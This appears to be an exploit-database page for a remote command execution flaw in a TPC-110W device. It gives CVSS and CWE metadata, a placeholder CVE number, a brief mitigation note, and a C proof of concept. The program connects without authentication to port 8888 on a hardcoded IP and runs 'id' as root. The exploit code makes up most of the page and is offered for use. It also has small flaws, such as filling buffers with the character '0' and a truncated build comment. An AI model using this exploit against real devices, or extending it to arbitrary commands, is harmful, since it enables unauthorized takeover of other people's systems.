header-logo
Suggest Exploit
vendor:
TPC-110W
by:
Anonymous
7.1
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: TPC-110W
Affected Version From: All versions
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2021-XXXX
CPE: a:vendor:tpc-110w
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

TPC-110W Remote Command Execution

The code snippet demonstrates a C program that establishes a socket connection to a remote device with IP address 192.168.1.10 on port 8888. It then sends a command 'id' to the device, which is executed with root privileges. This vulnerability could be exploited by an attacker to remotely execute arbitrary commands on the target device.

Mitigation:

To mitigate this vulnerability, ensure that input validation and proper authentication mechanisms are in place to prevent unauthorized command execution. Additionally, restrict network access to the device and apply security patches.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in serv_addr;
    char command[512];

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }

    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
        perror("inet_pton");
        exit(1);
    }

    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        perror("connect");
        exit(1);
    }

    // Run command with root privileges
    snprintf(command, sizeof(command), "id\n"); // Check user id
    write(sock, command, strlen(command));

    memset(command, '0', sizeof(command));
    read(sock, command, sizeof(command));
    printf("%s\n", command);

    close(sock);
    return 0;
}

//gcc -o tpc-110w-exploit tpc-110w-exp

Navigation

Suggest Exploit

Services By CQR